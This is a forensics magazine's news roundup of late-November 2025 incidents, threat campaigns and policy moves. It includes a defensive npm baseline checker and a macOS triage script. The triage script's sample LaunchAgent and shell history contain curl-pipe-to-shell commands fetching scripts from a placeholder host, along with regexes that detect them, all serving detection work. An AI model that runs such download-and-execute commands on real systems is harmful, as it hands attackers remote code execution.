Friday, November 28 2025
DFM News Roundup
Digital Forensics Magazine — 48h News Roundup
Window: 26-11-2025 00:00 to 28-11-2025 00:00 (UTC)

Snapshot Summary

Sector / Section | Headline Highlights | Count
DFIR & Incident Response | Vendor analytics breach at OpenAI, an Indian markets regulator–forensics partnership, and emergency response at Georgia’s court-records authority dominate this cycle’s DFIR landscape. | 3
Cyber Investigations | Cyber investigations range from Russia’s treason case against a security entrepreneur to scrutiny of how sensitive technical data and expertise are shared across borders. | 2
Major Cyber Incidents | Large-scale breaches at Asahi and Iberia, a disruptive attack on the CodeRED emergency alert system, and a serious cyber incident impacting multiple London councils show critical services and consumer brands under sustained pressure. | 4
Exploits & Threat Intelligence | North Korean OtterCookie supply-chain malware, Flexible Ferret macOS backdoors delivered via fake job offers, and a new Apache SkyWalking XSS flaw expand the active exploit and tooling landscape. | 3
Law Enforcement | Law-enforcement efforts this window focus on Poland’s arrest of a suspected Russian hacker behind widespread intrusions into online retailers and corporate networks. | 1
Policy | Policy moves include the UK’s SMB cyber letter, Thailand’s clampdown on Worldcoin iris scanning, and a draft US child online safety bill that could reshape platform monitoring and reporting duties. | 3
Standards & Compliance | New standards and compliance developments feature Net Insight’s ISO 27001 certification and Quttera’s evidence-as-code API aimed at streamlining SOC 2 and PCI DSS assurance. | 2

Digital Forensics & Incident Response

OpenAI discloses Mixpanel analytics incident — OpenAI disclosed on 27-11-2025 that its analytics vendor Mixpanel had been compromised, and that the attacker briefly accessed some customer billing and usage data after a phishing attack against Mixpanel staff [Global]. The incident highlights how third-party SaaS telemetry platforms can become high-value targets, pushing DFIR teams to tighten vendor monitoring, log retention, and data minimisation around analytics feeds (Source: OpenAI, 27-11-2025).

SEBI signs MoU with NFSU to bolster cyber forensics — India’s securities regulator SEBI signed a memorandum of understanding with the National Forensic Sciences University on 26-11-2025 to strengthen joint digital forensics and cyber investigation capabilities for capital markets supervision [APAC]. For DFIR practitioners this signals growing regulator expectations around high-quality forensic evidence, chain-of-custody, and specialist tooling in financial-sector probes (Source: Taxmann, 26-11-2025).

Georgia court-records authority limits access after ransomware threat — Georgia’s Superior Court Clerks’ Cooperative Authority activated incident response plans and temporarily limited access to its eFiling and records systems after a ransomware threat was flagged by the FBI on 25-11-2025 [AMER]. The case underlines how early law-enforcement intelligence and rapid isolation of court and justice systems can reduce downstream evidential risk and help DFIR teams preserve critical records (Source: Atlanta News First, 25-11-2025).

Cyber Investigations

Poland detains Russian suspected of hacking e-commerce databases — Polish authorities announced on 27-11-2025 that they had arrested a 23-year-old Russian national accused of hacking e-commerce databases and corporate IT networks across Poland and other EU states [EMEA]. The arrest demonstrates how long-running intrusion campaigns against online retailers are now being rolled up through coordinated cybercrime investigations, giving DFIR teams valuable insight into tools, infrastructure, and data-theft patterns (Source: The Cyber Express, 27-11-2025).

Russia charges cybersecurity entrepreneur with treason — Russian security services reportedly detained a young cybersecurity entrepreneur on treason charges linked to alleged unauthorised sharing of technical data with foreign organisations on 25-11-2025 [EMEA]. The case reflects rising pressure on independent security researchers in some jurisdictions, complicating cross-border collaboration and threat-intel sharing that many DFIR teams rely on (Source: Recorded Future News, 25-11-2025).

Major Cyber Incidents

Asahi breach exposes over 1.5 million people’s data — Japanese drinks giant Asahi confirmed that a ransomware attack on its domestic datacentre exposed personal data on about 1.5 million customers, employees and external contacts, with full recovery of operations not expected until early 2026; the incident was first detected on 29-09-2025 and detailed further on 27-11-2025 [APAC]. The breach underscores how deeply embedded OT–IT dependencies in manufacturing can prolong recovery and widen privacy exposure, demanding that DFIR teams coordinate closely with plant operations and data-protection officers (Source: Computing, 27-11-2025).

Iberia discloses supplier-linked data breach affecting frequent flyers — Spanish flag carrier Iberia notified customers on 24-11-2025 of a data security incident in which a third-party supplier was compromised, exposing names, email addresses and loyalty numbers tied to frequent-flyer accounts [EMEA]. The case illustrates the aviation sector’s growing reliance on external service providers and the need for DFIR teams to treat airline supply chains as part of the critical incident surface, including dark-web monitoring and vendor breach playbooks (Source: Cybernews, 25-11-2025).

CodeRED cyberattack disrupts US emergency alert systems — Risk-management firm Crisis24 confirmed that its OnSolve CodeRED emergency alert platform suffered a cyberattack disclosed on 25-11-2025 that disrupted emergency notification services used by local governments, police and fire agencies across the United States [AMER]. For incident responders this is a stark example of how attacks on SaaS-hosted public-safety platforms can create real-world safety impacts, elevating the priority of resilience testing and offline contingency channels (Source: BleepingComputer, 25-11-2025).

Cyber incident hits three London councils sharing IT services — Three London local authorities that share IT services—Kensington and Chelsea, Westminster, and Hammersmith and Fulham—reported on 26-11-2025 that a cybersecurity “issue” had disrupted multiple systems including phone lines, triggering business-continuity and emergency plans [EMEA]. The incident highlights the systemic risk created by shared municipal platforms and the importance for DFIR teams of mapping cross-council dependencies before an attack hits (Source: Recorded Future News, 26-11-2025).

Exploits & Threat Intelligence

OtterCookie supply-chain malware targets npm, GitHub and Vercel — Researchers reported on 27-11-2025 that North Korean state-linked actors are pushing an “OtterCookie” malware campaign by publishing hundreds of malicious npm packages and using GitHub and Vercel infrastructure to target JavaScript and Web3 developers [Global]. The operation shows how software-supply-chain compromises now blend developer-tooling abuse and social engineering, requiring DFIR and threat-hunting teams to baseline package usage and monitor build systems for anomalous dependencies (Source: Cyber Security News, 27-11-2025).
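The "baseline package usage" recommendation above is easy to state and rarely done. The following script is an added illustration for this roundup, not tooling from the researchers or any vendor: it reads a package-lock.json in the lockfileVersion 2/3 layout (a "packages" map keyed by paths such as "node_modules/foo") and compares it with an approved baseline, flagging packages that are new, whose version changed, or that declare an install-time lifecycle script (npm records this as "hasInstallScript"). Every package name and version in it is constructed sample data.

```python
"""Dependency baseline check for an npm lockfile.

Added illustration for this roundup; it is not OtterCookie tooling or any
vendor's product. It reads a package-lock.json in the lockfileVersion 2/3
layout (a "packages" map keyed by paths such as "node_modules/foo") and
compares it with an approved baseline, flagging packages that are new,
whose version changed, or that declare an install-time lifecycle script
(npm records this as "hasInstallScript"). All package names and versions
below are constructed sample data.
"""
import json

# Constructed baseline: package name -> version approved by the team
BASELINE = {
    "left-padder": "1.3.0",
    "@demo-scope/web3-utils": "4.0.1",
}

# Constructed lockfile standing in for a freshly generated package-lock.json
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "0.1.0"},
        "node_modules/left-padder": {"version": "1.3.0"},
        "node_modules/@demo-scope/web3-utils": {"version": "4.0.2"},
        # nested dependency pulled in transitively, with an install script
        "node_modules/left-padder/node_modules/totally-legit-helper": {
            "version": "0.0.1",
            "hasInstallScript": True,
        },
    },
})


def lock_packages(lock_text):
    """Map package name -> lockfile metadata for every installed package."""
    data = json.loads(lock_text)
    packages = {}
    for path, meta in data.get("packages", {}).items():
        if not path:
            continue  # "" is the root project itself
        # keep the text after the last "node_modules/", so nested and
        # scoped paths both reduce to the package name
        name = path.rsplit("node_modules/", 1)[-1]
        packages[name] = meta
    return packages


def diff_against_baseline(lock_text, baseline):
    """Return sorted (finding, package, detail) tuples worth a human look."""
    installed = lock_packages(lock_text)
    findings = []
    for name, meta in installed.items():
        version = meta.get("version")
        if name not in baseline:
            findings.append(("new_package", name, version))
        elif baseline[name] != version:
            findings.append(("version_changed", name, f"{baseline[name]} -> {version}"))
        if meta.get("hasInstallScript"):
            findings.append(("install_script", name, version))
    for name in baseline:
        if name not in installed:
            findings.append(("missing_from_lock", name, baseline[name]))
    return sorted(findings)


if __name__ == "__main__":
    for finding in diff_against_baseline(SAMPLE_LOCK, BASELINE):
        print(*finding)
```

Run against the constructed lockfile it reports the transitive package with an install script twice (once as new, once for the script) and the scoped package whose version drifted, while the baselined package is silent. A build-system check that fails the pipeline on any finding, and a reviewer who approves baseline updates, is the minimum control the OtterCookie pattern argues for.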

Flexible Ferret macOS malware spread via fake LinkedIn jobs — New research published on 26-11-2025 revealed a macOS malware chain dubbed Flexible Ferret that uses fake LinkedIn job offers and bogus FFmpeg updates to trick jobseekers into running curl commands that install a persistent backdoor [Global]. The campaign demonstrates how attackers are industrialising “Contagious Interview” social-engineering techniques, meaning DFIR teams must scrutinise terminal histories, LaunchAgents and LinkedIn-sourced lures in investigations involving compromised developer Macs (Source: Malwarebytes, 26-11-2025).
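To make the "scrutinise terminal histories and LaunchAgents" advice concrete, here is an added triage helper written for this roundup; it is not Malwarebytes' research code or any product. It parses a LaunchAgent plist with the standard-library plistlib and scans shell history for curl/wget commands that pipe into an interpreter or run via command substitution, the download-and-execute shape the campaign relies on. The plist, the history lines and the hostname example.invalid are constructed placeholders, and a plain download (such as the ffmpeg line) is deliberately not flagged so the analyst still reviews it by hand.

```python
"""Triage helpers for a developer Mac: LaunchAgent plists and shell history.

Added example for this roundup, not Malwarebytes' research code. It parses
LaunchAgent plists with plistlib and scans shell history for commands that
download and execute in one step. The plist, history lines and the host
example.invalid are constructed placeholders.
"""
import plistlib
import re

# Constructed LaunchAgent standing in for ~/Library/LaunchAgents/<label>.plist
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>curl -fsSL http://example.invalid/update.sh | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""

# Constructed shell history standing in for ~/.zsh_history or ~/.bash_history
SAMPLE_HISTORY = """\
git pull
curl -o ffmpeg.zip https://example.invalid/ffmpeg.zip
bash -c "$(curl -fsSL http://example.invalid/setup.sh)"
npm test
curl -s https://example.invalid/p.sh | bash
ls -la
"""

# curl/wget output piped straight into a shell or Python interpreter
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(sh|bash|zsh|python3?)\b")
# sh -c "$(curl ...)" style command substitution
CMD_SUBST = re.compile(r"\b(sh|bash|zsh)\s+-c\s+[\"']?\$\((curl|wget)\b")


def suspicious_command(cmd):
    """True when a command line downloads and executes in one step."""
    return bool(PIPE_TO_SHELL.search(cmd) or CMD_SUBST.search(cmd))


def triage_launch_agent(plist_bytes):
    """Summarise one LaunchAgent: label, flattened command, and reasons to look."""
    plist = plistlib.loads(plist_bytes)
    args = plist.get("ProgramArguments") or []
    command = " ".join(str(a) for a in args)
    reasons = []
    if suspicious_command(command):
        reasons.append("download-and-execute in ProgramArguments")
    if plist.get("RunAtLoad"):
        reasons.append("RunAtLoad")  # runs at login
    if plist.get("KeepAlive"):
        reasons.append("KeepAlive")  # relaunched if killed
    return {"label": plist.get("Label"), "command": command, "reasons": reasons}


def triage_history(history_text):
    """Return the history lines that download and execute in one step."""
    return [line for line in history_text.splitlines() if suspicious_command(line)]


if __name__ == "__main__":
    print(triage_launch_agent(SAMPLE_PLIST))
    for line in triage_history(SAMPLE_HISTORY):
        print("history:", line)
```

On a live system the same two functions would be run over every file in ~/Library/LaunchAgents and /Library/LaunchAgents and over each user's history file; the output is a shortlist for the analyst, not a verdict, because legitimate installers also use the curl-pipe-to-shell idiom.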

Apache SkyWalking XSS flaw tracked as CVE-2025-54057 — Apache disclosed CVE-2025-54057 on 27-11-2025, a cross-site scripting flaw in SkyWalking versions up to 10.2.0 caused by improper neutralisation of script-related HTML tags in web pages [Global]. Because SkyWalking is widely used for observability in microservices environments, DFIR and platform teams should prioritise upgrading to 10.3.0, review APM dashboards for signs of tampering, and treat observability consoles as potential post-exploitation targets (Source: NVD / Apache, 27-11-2025).

Law Enforcement

Polish police arrest Russian suspect accused of hacking corporate IT networks — Police in Kraków announced on 27-11-2025 that they had arrested a Russian national suspected of hacking into the IT systems and databases of Polish companies and online shops, potentially affecting victims across the EU [EMEA]. The case shows how specialised cybercrime units and interior ministries are increasingly public about major arrests, giving DFIR teams fresh indicators and context to correlate with intrusion telemetry in regional investigations (Source: The Cyber Express, 27-11-2025).

Policy

UK NCSC issues open letter on cyber basics for small businesses — The UK’s National Cyber Security Centre and partners issued an open letter on 26-11-2025 urging small and medium-sized businesses to adopt basic cyber controls such as MFA, patching and backups, warning that opportunistic attacks are increasingly crippling under-resourced firms [EMEA]. For CISOs and DFIR leads this provides an authoritative checklist for baseline controls and underlines that even “non-critical” organisations will face heightened expectations from regulators and insurers after incidents (Source: NCSC, 26-11-2025).

Thailand bans Worldcoin iris scans and orders biometric data deletion — Thailand’s Personal Data Protection Committee ordered Worldcoin on 26-11-2025 to stop scanning people’s irises in the country and delete any biometric data previously collected, citing privacy and security concerns [APAC]. This decision adds to regulatory headwinds for biometric-based crypto schemes and reminds DFIR and privacy teams that high-risk data such as biometrics can quickly become a focal point in cross-border investigations (Source: Recorded Future News, 26-11-2025).

US lawmakers float new draft children’s online safety bill — The US House Energy and Commerce Committee released a new draft children’s online safety bill on 26-11-2025 that would impose stricter requirements on platforms to detect and mitigate harms to under-18s [AMER]. If enacted, this could drive new logging, age-assurance and incident-reporting duties for online services, meaning DFIR teams will need to design investigations and data-retention policies that satisfy both safety regulators and privacy law (Source: Recorded Future News, 26-11-2025).

Standards & Compliance

Net Insight earns ISO/IEC 27001 certification — Swedish media-transport specialist Net Insight announced on 27-11-2025 that it has achieved ISO/IEC 27001 certification for its information-security management system covering product development and cloud services [EMEA]. The certification shows how broadcast-technology vendors are aligning with formal security baselines, giving DFIR and procurement teams stronger levers to demand documented controls and audit evidence from suppliers (Source: Net Insight, 27-11-2025).

Quttera launches evidence-as-code API for SOC 2 and PCI DSS — Website security firm Quttera introduced a “QES Evidence-as-Code” API in late November 2025 to automate the collection of forensically sound evidence and compliance artefacts for frameworks such as SOC 2 and PCI DSS [Global]. This type of tooling can significantly reduce manual evidence-gathering during post-incident audits, allowing DFIR teams to plug findings directly into GRC workflows and continuous-compliance pipelines (Source: Quttera, 26-11-2025).

Editorial Perspective

This 48-hour window reinforces how third-party platforms—analytics services, emergency alert systems, airline suppliers and shared municipal IT—are becoming the weakest link in digital resilience, often dictating the tempo and scope of incident response as much as in-house security controls. DFIR teams can no longer treat vendor environments as “black boxes”; they must be mapped, monitored and included in tabletop exercises as first-class parts of the enterprise attack surface.

At the same time, threat actors are evolving their tradecraft around developers and job seekers, blending supply-chain compromises like OtterCookie with highly targeted social-engineering campaigns such as Flexible Ferret that abuse familiar tools like LinkedIn, curl and open-source APM. This should prompt organisations to extend detection logic and logging into build pipelines, terminal usage and developer endpoints, where traditional endpoint controls frequently lack context or visibility.

On the governance side, regulators and standard-setters—from the UK’s NCSC and Thailand’s privacy watchdog to US lawmakers and ISO certification bodies—are steadily raising expectations on both baseline cyber hygiene and evidential rigour after an incident. DFIR leaders who invest now in joined-up response playbooks, evidence-as-code pipelines and clear lines of communication with law enforcement will be better placed to navigate the next wave of cross-border investigations and regulatory scrutiny.

Tags

DFIR, Cybersecurity News, Threat Intelligence, Ransomware, Law Enforcement, Compliance, EU CRA
